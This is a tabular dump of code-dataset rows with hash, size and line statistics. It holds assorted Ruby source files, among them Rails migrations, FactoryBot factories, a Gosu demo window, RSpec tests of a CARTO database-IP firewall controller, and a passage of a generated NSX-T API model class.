hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1) |
---|---|---|---|---|---|
e825093059d3f86e96914aeeac62ad7e03262d48 | 206 | class AddSubmittedAtToEvaluation < ActiveRecord::Migration
def self.up
add_column :evaluations, :submitted_at, :datetime
end
def self.down
remove_column :evaluations, :submitted_at
end
end
| 20.6 | 58 | 0.76699 |
08161ad1c6ec89bceb410fb921610365705392e8 | 362 | if defined?(ActiveRecord)
module ActiveRecord
module ConnectionAdapters
class ConnectionPool
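# Temporarily clears @lock_thread (the thread the pool is pinned to, typically
# set by transactional tests) so with_connection can check out a fresh
# connection, yields it, and restores the previous lock thread afterwards.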
def force_new_connection
old_lock = @lock_thread
@lock_thread = nil
with_connection do |conn|
yield conn
end
ensure
@lock_thread = old_lock
end
end
end
end
end | 21.294118 | 35 | 0.582873 |
bbc2648228a027f57dc8d8a9809c062e7136808a | 44 | # Add your variables here
def first_number(x, y)
end
| 14.666667 | 25 | 0.772727 |
5df2b7c32d6f6783515ed84ee0b74baa48910551 | 846 | # frozen_string_literal: true
FactoryBot.define do
factory :project_repository_storage_move, class: 'ProjectRepositoryStorageMove' do
container { association(:project) }
source_storage_name { 'default' }
trait :scheduled do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:scheduled].value }
end
trait :started do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:started].value }
end
trait :replicated do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:replicated].value }
end
trait :finished do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:finished].value }
end
trait :failed do
state { ProjectRepositoryStorageMove.state_machines[:state].states[:failed].value }
end
end
end
| 28.2 | 93 | 0.732861 |
6a2fbfce9ec550184264f4b740b97ce5fc5c54eb | 1,636 | # Encoding: UTF-8
require "gosu"
WIDTH, HEIGHT = 640, 480
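# When loaded by the example box an Example base class is already defined and
# used; when run as a stand-alone script the `rescue` falls back to Gosu::Window.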
class Welcome < (Example rescue Gosu::Window)
PADDING = 20
def initialize
super WIDTH, HEIGHT
self.caption = "Welcome!"
text =
"<b>Welcome to the Gosu Example Box!</b>
This little tool lets you launch any of Gosu’s example games from the list on the right hand side of the screen.
Every example can be run both from this tool <i>and</i> from the terminal/command line as a stand-alone Ruby script.
Keyboard shortcuts:
• To see the source code of an example or feature demo, press <b>E</b>.
• To open the ‘examples’ folder, press <b>O</b>.
• To quit this tool, press <b>Esc</b>.
• To toggle fullscreen mode, press <b>Alt+Enter</b> (Windows, Linux) or <b>cmd+F</b> (macOS).
Why not take a look at the code for this example right now? Simply press <b>E</b>."
# Remove all leading spaces so the text is left-aligned
text.gsub! /^ +/, ""
@text = Gosu::Image.from_markup text, 20, width: WIDTH - 2 * PADDING
@background = Gosu::Image.new "media/space.png"
end
def draw
draw_rotating_star_backgrounds
@text.draw PADDING, PADDING, 0
end
def draw_rotating_star_backgrounds
# Disregard the math in this method, it doesn't look as good as I thought it
# would. =(
angle = Gosu.milliseconds / 50.0
scale = (Gosu.milliseconds % 1000) / 1000.0
[1, 0].each do |extra_scale|
@background.draw_rot WIDTH * 0.5, HEIGHT * 0.75, 0, angle, 0.5, 0.5,
scale + extra_scale, scale + extra_scale
end
end
end
Welcome.new.show if __FILE__ == $0
| 27.266667 | 122 | 0.651589 |
389c9ca51a4e42cb033d052467e83ce6e6764b14 | 99 | # frozen_string_literal: true
# Defines the gem version.
module SlimLint
VERSION = '0.20.2'
end
| 14.142857 | 29 | 0.737374 |
180d785d4d9774bf0668a52964bba2197514a7dc | 1,172 | module SimpleApiAuth
class Request
attr_accessor :headers, :http_verb, :query_string, :uri, :body, :original
def initialize(options = {})
assign_options(options)
@normalizer = SimpleApiAuth.config.request_normalizer.new
@header_field = SimpleApiAuth.config.request_fields[:headers]
self.headers = @normalizer.normalize_headers(headers)
self.http_verb = http_verb.downcase.to_sym
end
def time
header_key = SimpleApiAuth.config.header_keys[:saa_auth_time]
Time.parse(headers[header_key])
rescue ArgumentError, TypeError
nil
end
def add_header(key, value)
headers[key] = value
denormalized_key = @normalizer.denormalize(key)
original.send(@header_field)[denormalized_key] = value
end
def self.create(request)
return request if request.is_a?(Request)
options = {}
SimpleApiAuth.config.request_fields.each do |k, v|
options[k] = request.send(v)
end
Request.new(options.merge(original: request))
end
private
def assign_options(options)
options.each do |k, v|
send("#{k}=", v)
end
end
end
end
| 26.636364 | 77 | 0.670648 |
088b85dd5da4fa1e6ee497bfd48c1c033b2ed312 | 1,386 | # frozen_string_literal: true
class MigrateNullPackageFilesFileStoreToLocalValue < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
JOB_INTERVAL = 2.minutes + 5.seconds
BATCH_SIZE = 5_000
MIGRATION = 'SetNullPackageFilesFileStoreToLocalValue'
disable_ddl_transaction!
class PackageFile < ActiveRecord::Base
self.table_name = 'packages_package_files'
include ::EachBatch
end
def up
# On GitLab.com, there are 2M package files. None have NULL file_store
# because they are all object stored. This is a no-op for GitLab.com.
#
# If a customer had 2M package files with NULL file_store, with batches of
# 5000 and a background migration job interval of 2m 5s, then 400 jobs would
# be scheduled over 14 hours.
#
# The index `index_packages_package_files_file_store_is_null` is
# expected to be used here and in the jobs.
#
# queue_background_migration_jobs_by_range_at_intervals is not used because
# it would enqueue 18.6K jobs and we have an index for getting these ranges.
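#
# Worked example for the 2M-row case above: 2_000_000 / 5_000 = 400 batches,
# and 400 * (2m 5s) = 50_000s, i.e. roughly 13.9 hours until the last job runs.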
PackageFile.where(file_store: nil).each_batch(of: BATCH_SIZE) do |batch, index|
range = batch.pluck(Arel.sql("MIN(id)"), Arel.sql("MAX(id)")).first
delay = index * JOB_INTERVAL
migrate_in(delay.seconds, MIGRATION, [*range])
end
end
def down
# noop
end
end
| 31.5 | 83 | 0.726551 |
ac56237b53ab37893f57216ede1c3b79e3e404ea | 233 | class TrialOrderSelectionMapping < ApplicationRecord
belongs_to :trial_order, :foreign_key => "trial_order_id"
belongs_to :user, :foreign_key => "user_id"
belongs_to :phase_definition, :foreign_key => "phase_definition_id"
end
| 38.833333 | 69 | 0.793991 |
f747abdf58f71b7a364a0831f9780c01a5db041b | 387 | class CreateProducts < ActiveRecord::Migration
def self.up
create_table :products do |t|
t.integer :category_id, :vendor_id
t.float :unit_price, :null => false
t.string :description, :name, :null => false
t.integer :status, :product_type, :default => 0, :null => false
t.timestamps
end
end
def self.down
drop_table :products
end
end
| 24.1875 | 69 | 0.648579 |
3923cfca0e5fb5c875e4dcf02d19c6f26750a3b4 | 2,050 | require 'rails_vue_js_spec_helper'
require_relative "../support/test_controller"
require_relative "support/form_test_controller"
require_relative "support/model_form_test_controller"
include VueJsSpecUtils
describe "Form Component", type: :feature, js: true do
before :all do
class DelayFormTestController < FormTestController
def success_submit
receive_timestamp = DateTime.now.strftime('%Q')
render json: { received_at: receive_timestamp }, status: 200
end
end
Rails.application.routes.append do
post '/delay_success_form_test', to: 'delay_form_test#success_submit', as: 'form_delay_success_submit'
end
Rails.application.reload_routes!
end
before :each do
allow_any_instance_of(DelayFormTestController).to receive(:expect_params)
end
describe "delay attribute" do
it "if set, delays form submit" do
class ExamplePage < Matestack::Ui::Page
def response
matestack_form form_config do
form_input key: :foo, type: :text, id: "my-test-input"
button 'Submit me!'
end
div id: "timestamp" do
toggle show_on: "form_submitted_successfully", id: 'async-form' do
paragraph "{{vc.event.data.received_at}}", id: 'received_timestamp'
end
end
end
def form_config
return {
for: :my_object,
method: :post,
path: form_delay_success_submit_path,
delay: 1000,
success: {
emit: "form_submitted_successfully"
}
}
end
end
visit '/example'
submit_timestamp = DateTime.now.strftime('%Q').to_i
fill_in "my-test-input", with: submit_timestamp
click_button "Submit me!"
expect(page).to have_selector(:css, '#received_timestamp', wait: 2)
element = page.find("#received_timestamp")
receive_timestamp = element.text.to_i
expect(receive_timestamp - submit_timestamp).to be > 1000
end
end
end
| 29.710145 | 108 | 0.648293 |
b906c0156fd7db7894e8c4124483d37110d5f9d5 | 863 | require 'spec_helper'
RSpec.describe 'Uniswap integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:dai_eth_pair) { Cryptoexchange::Models::MarketPair.new(base: 'dai', target: 'eth', market: 'uniswap') }
it 'fetch pairs' do
pairs = client.pairs('uniswap')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'uniswap'
end
it 'fetch ticker' do
ticker = client.ticker(dai_eth_pair)
expect(ticker.base).to eq 'DAI'
expect(ticker.target).to eq 'ETH'
expect(ticker.market).to eq 'uniswap'
expect(ticker.volume).to be_a Numeric
expect(ticker.last).to be_a Numeric
expect(ticker.high).to be_a Numeric
expect(ticker.low).to be_a Numeric
expect(ticker.payload).to_not be nil
end
end
| 26.96875 | 110 | 0.692932 |
082a4d47a7fad3d1183ab57188362aa74e5ef660 | 1,831 | # frozen_string_literal: true
describe Facter::Resolvers::DMIComputerSystem do
let(:logger) { instance_spy(Facter::Log) }
before do
win = double('Facter::Util::Windows::Win32Ole')
allow(Facter::Util::Windows::Win32Ole).to receive(:new).and_return(win)
allow(win).to receive(:return_first).with('SELECT Name,UUID FROM Win32_ComputerSystemProduct').and_return(comp)
Facter::Resolvers::DMIComputerSystem.instance_variable_set(:@log, logger)
end
after do
Facter::Resolvers::DMIComputerSystem.invalidate_cache
end
describe '#resolve' do
let(:comp) { double('WIN32OLE', Name: 'VMware7,1', UUID: 'C5381A42-359D-F15B-7A62-4B6ECBA079DE') }
it 'detects virtual machine name' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:name)).to eql('VMware7,1')
end
it 'detects uuid of virtual machine' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:uuid)).to eql('C5381A42-359D-F15B-7A62-4B6ECBA079DE')
end
end
describe '#resolve when WMI query returns nil' do
let(:comp) {}
it 'logs debug message and name is nil' do
allow(logger).to receive(:debug)
.with('WMI query returned no results for Win32_ComputerSystemProduct with values Name and UUID.')
expect(Facter::Resolvers::DMIComputerSystem.resolve(:name)).to be(nil)
end
it 'detects uuid as nil' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:uuid)).to be(nil)
end
end
describe '#resolve when WMI query returns nil for Name and UUID' do
let(:comp) { double('WIN32OLE', Name: nil, UUID: nil) }
it 'detects name as nil' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:name)).to be(nil)
end
it 'detects uuid as nil' do
expect(Facter::Resolvers::DMIComputerSystem.resolve(:uuid)).to be(nil)
end
end
end
| 32.122807 | 115 | 0.703441 |
038de5c18e5d3cf8f61c6c6b419ba0aba25d713c | 19,037 | require 'spec_helper_min'
require 'support/helpers'
require 'helpers/feature_flag_helper'
require 'spec_helper'
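# Test double standing in for the real firewall manager: created/updated rules
# and the last configuration it was built with are recorded in class-level
# state so the examples below can assert on them.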
class TestFirewallManager
@rules = {}
@config = nil
class << self
attr_reader :rules, :config
attr_writer :config
end
def initialize(config)
@config = config
TestFirewallManager.config = config
end
attr_reader :config
def delete_rule(rule_name)
raise "FIREWALL DELETE ERROR" unless TestFirewallManager.rules.has_key?(rule_name)
TestFirewallManager.rules.delete rule_name
end
def create_rule(rule_name, ips)
raise "FIREWALL CREATE ERROR" if TestFirewallManager.rules.has_key?(rule_name)
TestFirewallManager.rules[rule_name] = ips
end
def update_rule(rule_name, ips)
raise "FIREWALL UPDATE ERROR" unless TestFirewallManager.rules.has_key?(rule_name)
TestFirewallManager.rules[rule_name] = ips
end
end
class TestErrorFirewallManager
def initialize(config)
end
def delete_rule(rule_name)
raise "FIREWALL ERROR"
end
def create_rule(rule_name, ips)
raise "FIREWALL ERROR"
end
def update_rule(rule_name, ips)
raise "FIREWALL ERROR"
end
end
describe Carto::Api::DbdirectIpsController do
include_context 'users helper'
include HelperMethods
include FeatureFlagHelper
include Rack::Test::Methods
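# Mirrors the '<<{{id}}>>' rule_name template from @config, giving the firewall
# rule name expected for a given user or organization.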
def rule(id)
"<<#{id}>>"
end
before(:all) do
host! "#{@carto_user1.username}.localhost.lan"
@feature_flag = FactoryGirl.create(:feature_flag, name: 'dbdirect', restricted: true)
@config = {
firewall: {
enabled: true,
rule_name: '<<{{id}}>>'
}
}.with_indifferent_access
@sequel_organization = FactoryGirl.create(:organization_with_users)
@organization = Carto::Organization.find(@sequel_organization.id)
@org_owner = @organization.owner
@org_user = @organization.users.reject { |u| u.id == @organization.owner_id }.first
end
after(:all) do
@feature_flag.destroy
@organization.destroy
end
after(:each) do
logout
end
describe '#update' do
before(:each) do
@params = { api_key: @carto_user1.api_key }
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestFirewallManager)
end
after(:each) do
Carto::DbdirectIp.delete_all
TestFirewallManager.rules.clear
TestFirewallManager.config = nil
end
it 'needs authentication for ips creation' do
params = {
ips: ['100.20.30.40']
}
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(401)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
it 'needs the feature flag for ips creation' do
params = {
ips: ['100.20.30.40'],
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', false do
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(403)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
end
it 'creates ips with api_key authentication' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'creates ips with login authentication' do
ips = ['100.20.30.40']
params = {
ips: ips
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'retains only latest ips assigned' do
ips1 = ['100.20.30.40', '200.20.31.0/24']
ips2 = ['11.21.31.41']
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
params = {
ips: ips1,
api_key: @carto_user1.api_key
}
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips1
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips1
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips1
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
params = {
ips: ips2,
api_key: @carto_user1.api_key
}
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips2
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips2
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq ips2
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'rejects invalid IPs' do
invalid_ips = [
['0.0.0.0'], ['10.20.30.40'], ['127.0.0.1'], ['192.168.1.1'],
['120.120.120.120/20'], ['100.100.100.300'], ['not-an-ip'],
[11223344],
'100.20.30.40'
]
invalid_ips.each do |ips|
params = {
ips: ips,
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(422)
expect(response.body[:errors]).not_to be_nil
expect(response.body[:errors][:ips]).not_to be_nil
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
end
end
it 'IP ranges in firewall are normalized' do
ips = ['100.20.30.40', '12.12.12.12/24']
normalized_ips = ['100.20.30.40', '12.12.12.0/24']
params = {
ips: ips
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq normalized_ips
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@carto_user1.dbdirect_effective_ip.firewall_rule_name).to eq rule(@carto_user1.username)
end
end
end
end
it 'IP changes affect all the organization members' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @org_user.api_key
}
with_host "#{@org_user.username}.localhost.lan" do
with_feature_flag @org_user, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
put_json dbdirect_ip_url(params.merge(host: host)) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@org_user.reload.dbdirect_effective_ips).to eq ips
expect(@org_owner.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules[rule(@organization.name)]).to eq ips
expect(TestFirewallManager.rules[rule(@org_user.username)]).to be_nil
expect(TestFirewallManager.rules[rule(@org_owner.username)]).to be_nil
expect(TestFirewallManager.config).to eq @config[:firewall]
expect(@org_user.dbdirect_effective_ip.firewall_rule_name).to eq rule(@organization.name)
expect(@org_owner.dbdirect_effective_ip.firewall_rule_name).to eq rule(@organization.name)
end
end
end
end
end
it 'returns error response if firewall service fails' do
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestErrorFirewallManager)
ips = ['100.20.30.40']
params = {
ips: ips
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(500)
expect(response.body[:errors]).to match(/FIREWALL ERROR/)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
end
end
end
end
it 'omits firewall management if not enabled' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @carto_user1.api_key
}
config = {
firewall: {
enabled: false,
rule_name: '<<{{id}}>>'
}
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: config do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules).to be_empty
expect(TestFirewallManager.config).to be_nil
end
end
end
end
it 'omits firewall management by default' do
ips = ['100.20.30.40']
params = {
ips: ips,
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: {} do
put_json(dbdirect_ip_url, params) do |response|
expect(response.status).to eq(201)
expect(response.body[:ips]).to eq ips
expect(@carto_user1.reload.dbdirect_effective_ips).to eq ips
expect(TestFirewallManager.rules).to be_empty
expect(TestFirewallManager.config).to be_nil
end
end
end
end
end
describe '#destroy' do
before(:each) do
@params = { api_key: @carto_user1.api_key }
@existing_ips = ['100.20.30.40']
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestFirewallManager)
Cartodb.with_config dbdirect: @config do
@carto_user1.dbdirect_effective_ips = @existing_ips
TestFirewallManager.rules[rule(@carto_user1.username)] = @existing_ips
end
end
after(:each) do
Carto::DbdirectIp.delete_all
TestFirewallManager.rules.clear
TestFirewallManager.config = nil
end
it 'needs authentication for ips deletion' do
params = {}
Cartodb.with_config dbdirect: @config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(401)
expect(@carto_user1.reload.dbdirect_effective_ips).to eq @existing_ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
it 'needs the feature flag for ips deletion' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', false do
Cartodb.with_config dbdirect: @config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(403)
expect(@carto_user1.reload.dbdirect_effective_ips).to eq @existing_ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
it 'deletes ips with api_key authentication' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
expect(TestFirewallManager.config).to eq @config[:firewall]
end
end
end
end
it 'deletes ips with login authentication' do
params = {
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to be_nil
expect(TestFirewallManager.config).to eq @config[:firewall]
end
end
end
end
it 'returns error response if firewall service fails' do
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestErrorFirewallManager)
params = {
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
login_as(@carto_user1, scope: @carto_user1.username)
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(500)
expect(response.body[:errors]).to match(/FIREWALL ERROR/)
expect(@carto_user1.reload.dbdirect_effective_ips).to eq @existing_ips
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
it 'omits firewall management if not enabled' do
config = {
firewall: {
enabled: false,
rule_name: '<<{{id}}>>'
}
}
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: config do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
it 'omits firewall management by default' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: {} do
delete_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(204)
expect(@carto_user1.reload.dbdirect_effective_ips).to be_empty
expect(TestFirewallManager.rules[rule(@carto_user1.username)]).to eq @existing_ips
end
end
end
end
end
describe '#show' do
before(:each) do
@ips = ['100.20.30.40']
Carto::DbdirectIp.stubs(:firewall_manager_class).returns(TestFirewallManager)
Cartodb.with_config dbdirect: @config do
@carto_user1.dbdirect_effective_ips = @ips
end
TestFirewallManager.rules[rule(@carto_user1.username)] = @ips
end
after(:each) do
Carto::DbdirectCertificate.delete_all
TestFirewallManager.rules.clear
TestFirewallManager.config = nil
end
it 'needs authentication for showing ips' do
params = {
}
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(401)
end
end
end
it 'needs the feature flag for showing ips' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', false do
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(403)
end
end
end
end
it 'shows ips with api key authentication' do
params = {
api_key: @carto_user1.api_key
}
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(200)
expect(response.body[:ips]).to eq @ips
end
end
end
end
it 'shows ips with login authentication' do
params = {
}
with_feature_flag @carto_user1, 'dbdirect', true do
login_as(@carto_user1, scope: @carto_user1.username)
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(200)
expect(response.body[:ips]).to eq @ips
end
end
end
end
it 'returns empty ips array when not configured' do
params = {
api_key: @carto_user1.api_key
}
Cartodb.with_config dbdirect: @config do
@carto_user1.reload.dbdirect_effective_ips = nil
end
with_feature_flag @carto_user1, 'dbdirect', true do
Cartodb.with_config dbdirect: @config do
get_json dbdirect_ip_url(params) do |response|
expect(response.status).to eq(200)
expect(response.body[:ips]).to eq []
end
end
end
end
end
end
| 34.177738 | 107 | 0.636602 |
626d44ba0a20a4d3c9396408cd933e4c73a42f1a | 628 | require 'rails_helper'
require 'ruby_prof'
module RailsProbe
module Printers
RSpec.describe GraphText do
let(:result) { double('result') }
let(:report) { double('report') }
let(:action) { double('action') }
subject { described_class.new(result, report, action) }
describe '::PRINTER' do
it 'returns the RubyProf printer class' do
expect(GraphText::PRINTER).to eq(RubyProf::GraphPrinter)
end
end
describe '#name' do
it 'returns name of the printer' do
expect(subject.name).to eq('Graph Text')
end
end
end
end
end
| 23.259259 | 66 | 0.611465 |
187376b9c32a65fad749c6fc2f8abff28b1d8b1a | 59 | module Mobb
module Redis
VERSION = '1.0.0'
end
end
| 9.833333 | 21 | 0.627119 |
91d65d521c5be5be18110285b4a3b0ef815e0fcb | 20,586 | =begin
#NSX-T Manager API
#VMware NSX-T Manager REST API
OpenAPI spec version: 2.5.1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXT
# Represents a Label-Value widget configuration
class LabelValueConfiguration
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# The _revision property describes the current revision of the resource. To prevent clients from overwriting each other's changes, PUT operations must include the current _revision of the resource, which clients should obtain by issuing a GET operation. If the _revision provided in a PUT request is missing or stale, the operation will be rejected.
attr_accessor :_revision
# Indicates system owned resource
attr_accessor :_system_owned
# Title of the widget. If display_name is omitted, the widget will be shown without a title.
attr_accessor :display_name
# Description of this resource
attr_accessor :description
# Opaque identifiers meaningful to the API user
attr_accessor :tags
# ID of the user who created this resource
attr_accessor :_create_user
# Protection status is one of the following: PROTECTED - the client who retrieved the entity is not allowed to modify it. NOT_PROTECTED - the client who retrieved the entity is allowed to modify it REQUIRE_OVERRIDE - the client who retrieved the entity is a super user and can modify it, but only when providing the request header X-Allow-Overwrite=true. UNKNOWN - the _protection field could not be determined for this entity.
attr_accessor :_protection
# Timestamp of resource creation
attr_accessor :_create_time
# Timestamp of last modification
attr_accessor :_last_modified_time
# ID of the user who last modified this resource
attr_accessor :_last_modified_user
# Unique identifier of this resource
attr_accessor :id
# Supported visualization types are LabelValueConfiguration, DonutConfiguration, GridConfiguration, StatsConfiguration, MultiWidgetConfiguration, GraphConfiguration and ContainerConfiguration.
attr_accessor :resource_type
# The 'datasources' represent the sources from which data will be fetched. Currently, only NSX-API is supported as a 'default' datasource. An example of specifying 'default' datasource along with the urls to fetch data from is given at 'example_request' section of 'CreateWidgetConfiguration' API.
attr_accessor :datasources
# Specify relavite weight in WidgetItem for placement in a view. Please see WidgetItem for details.
attr_accessor :weight
# Icons to be applied at dashboard for widgets and UI elements.
attr_accessor :icons
# Please use the property 'shared' of View instead of this. The widgets of a shared view are visible to other users.
attr_accessor :shared
attr_accessor :footer
# Id of drilldown widget, if any. Id should be a valid id of an existing widget. A widget is considered as drilldown widget when it is associated with any other widget and provides more detailed information about any data item from the parent widget.
attr_accessor :drilldown_id
# Set to true if this widget should be used as a drilldown.
attr_accessor :is_drilldown
# Legend to be displayed. If legend is not needed, do not include it.
attr_accessor :legend
# Layout of properties can be vertical or grid. If layout is not specified a default vertical layout is applied.
attr_accessor :layout
# Hyperlink of the specified UI page that provides details.
attr_accessor :navigation
# A sub-type of LabelValueConfiguration. If sub-type is not specified the parent type is rendered. For VERTICALLY_ALIGNED sub_type, the value is placed below the label.
attr_accessor :sub_type
# An array of label-value properties.
attr_accessor :properties
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'_revision' => :'_revision',
:'_system_owned' => :'_system_owned',
:'display_name' => :'display_name',
:'description' => :'description',
:'tags' => :'tags',
:'_create_user' => :'_create_user',
:'_protection' => :'_protection',
:'_create_time' => :'_create_time',
:'_last_modified_time' => :'_last_modified_time',
:'_last_modified_user' => :'_last_modified_user',
:'id' => :'id',
:'resource_type' => :'resource_type',
:'datasources' => :'datasources',
:'weight' => :'weight',
:'icons' => :'icons',
:'shared' => :'shared',
:'footer' => :'footer',
:'drilldown_id' => :'drilldown_id',
:'is_drilldown' => :'is_drilldown',
:'legend' => :'legend',
:'layout' => :'layout',
:'navigation' => :'navigation',
:'sub_type' => :'sub_type',
